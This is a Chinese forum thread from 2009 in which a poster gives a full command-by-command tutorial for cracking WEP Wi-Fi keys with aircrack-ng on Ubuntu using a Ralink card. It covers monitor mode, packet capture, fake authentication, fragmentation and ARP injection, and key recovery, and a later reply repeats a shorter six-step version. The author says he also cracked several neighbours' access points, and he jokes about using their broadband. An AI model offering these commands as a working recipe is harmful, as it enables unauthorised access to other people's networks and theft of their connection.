瑞银100%破解成功的方法

princerib

之前试过用minileaf同学的驱动包做的SLAX和BT4使用瑞银网卡来破解都没有成功过，今天把我的Ubuntu8.10升级到了9.04 beta版，忽然心血来潮想看看最新的Ubuntu对瑞银的驱动会不会升级，从而可以破解无线密码，结果还真是惊喜无限，废话不多说了，下面贴图跟各位同学分享。。。

1、安装Ubuntu 9.04 (Jaunty Jackalope) Beta
附下载地址(请根据自己的CPU下载Intel版本还是AMD版本)：
http://releases.ubuntu.com/releases/9.04/

建议先装个虚拟光驱软件DAEMON Tools Lite
附下载地址：
http://dl.pconline.com.cn/html_2/1/121/id=1051&pn=0.html

然后用DAEMON加载Ubuntu的ISO包，用它的WUBI来安装，这样一不用刻碟、二不用重新分个区给Ubuntu，就跟给XP安装软件一样，又可以享受双系统，当你不想用它了只要在控制面板删除即可

2、升级ubuntu到最新版本：System->Administration->Update Manager


3、在终端中输入 sudo apt-get install aircrack-ng 安装aircrack-ng




二、破解过程

1、启动无线网卡的监控模式

   sudo airmon-ng start wlan0



2、开始抓包
   
   sudo airodump-ng -c 6 --bssid 无线路由MAC地址 --ivs -w TestAP mon0



3、建立虚拟连接
  sudo aireplay-ng -1 0 -a 无线路由MAC地址 -h 瑞银网卡MAC地址 mon0



4、使用fragmentation attack来获得PRGA

   sudo aireplay-ng -5 -b 无线路由MAC地址 -h 瑞银网卡MAC地址 mon0



5、使用packetforge-ng 来产生一个arp包

   packetforge-ng -0 -a 无线路由MAC地址 -h 瑞银网卡MAC地址 5 -k 255.255.255.255 -l 255.255.255.255 -y fragment-0328-170949.xor -w TestAP


6、注入arp包

   sudo aireplay-ng -2 -r TestAP -x 1024 mon0



7、开始注入后DATA飞涨



8、DATA涨到一定量后破解密码

   sudo aircrack-ng TestAP*.ivs



注：上面图里的无线路由是我自家的，也试过破附近邻居的几个AP都一样成功，另外用aireplay-ng -2 -p 0841破解同样没問题。

    顺便打下广告：文明Ceng，最好不要用邻居家的宽带BT,如果真的是不得不用请限制下载速度在总带宽的30%以内！

风筝

这个很要支持一下！～～

无名人

谢谢楼主，红旗下怎么用？

韩寒

还是不太懂，能做个更详细的教程吗？

codeblue

很好。等正式版出来 上ub。。吼吼。习惯 。。每年 都 换两次。都 不怎么用。看来这次可以用久点了。。


吼吼 。。。最后 的广告不错。。。。。

韩寒

开源的系统我也玩过，不过全是英的。看不懂。

shenjj78

同意文明Ceng，呵呵

princerib

谢谢楼主，红旗下怎么用？
无名人 发表于 2009-3-28 19:41

红旗我没用过，关键是瑞银的驱动，ubuntu 9.04 beta自带的瑞银驱动就可以很完美的支持aireplay-ng进行破解（强过SLAX和BT4），你可以在红旗上安装aireplay-ng试试，如果装了后不能破解就是红旗的瑞银驱动不支持。。。

princerib

还是不太懂，能做个更详细的教程吗？
韩寒 发表于 2009-3-28 19:51

ubuntu 9.04 安装可以参照下面的8.04
http://www.ownlinux.cn/2008/04/30/ubuntu-804-wubi/

破解步聚论坛有许多，请善用搜索，其实最简单的就是用下面的六步曲：
1、启动无线网卡的监控模式
sudo airmon-ng start wlan0
2、扫描有哪些AP在线，扫描后按 ctrl+c 退出，保留终端，你可以看到哪些是加密的，用什么加密方式，哪些是没加密的，所在的频道是多少
sudo airodump-ng mon0
3、抓你要破解的AP的数据包，新建终端输入
sudo airodump-ng -c 无线路所在频道 --bssid AP's MAC  --ivs -w wep mon0
4、建立虚拟连接，新建终端输入
sudo airodump-ng -c 无线路所在频道 --bssid AP's MAC -w wep mon0
5、-2 -F -p 0841注入，新建终端输入
sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b AP's MAC -h USR's MAC mon0
6、算密码，新建终端输入
sudo aircrack-ng wep*.ivs

注：
wep 为抓取的数据包保存的名字，可以任取
AP's MAC 为无线路由的MAC地址，
USR's MAC 为瑞银网卡的MAC地址，在终端里输入ifconfig 查看，或者在瑞银网卡的背面MAC ID后面跟着的就是
算密码一般在DATA收集到2、3W的时候进行
因为是用-2 -F -p 0841 方式注入，所以破了密码后用ctrl+c 是退不出的，要新建个终端输入 sudo airmon-ng stop mon0 来终止，如果接下来后要破其它的AP,请重复上面的步聚

princerib

楼主做个好的教程啊
ioioioio 发表于 2009-3-28 20:35

可以参考我之前发的贴子，http://forum.anywlan.com/viewthread.php?tid=12521&extra=&page=1

princerib

开源的系统我也玩过，不过全是英的。看不懂。
韩寒 发表于 2009-3-28 19:52

ubuntu 在刚装的时候是英文的，装好后你只要上网更新一下语言包就是完美的中文版了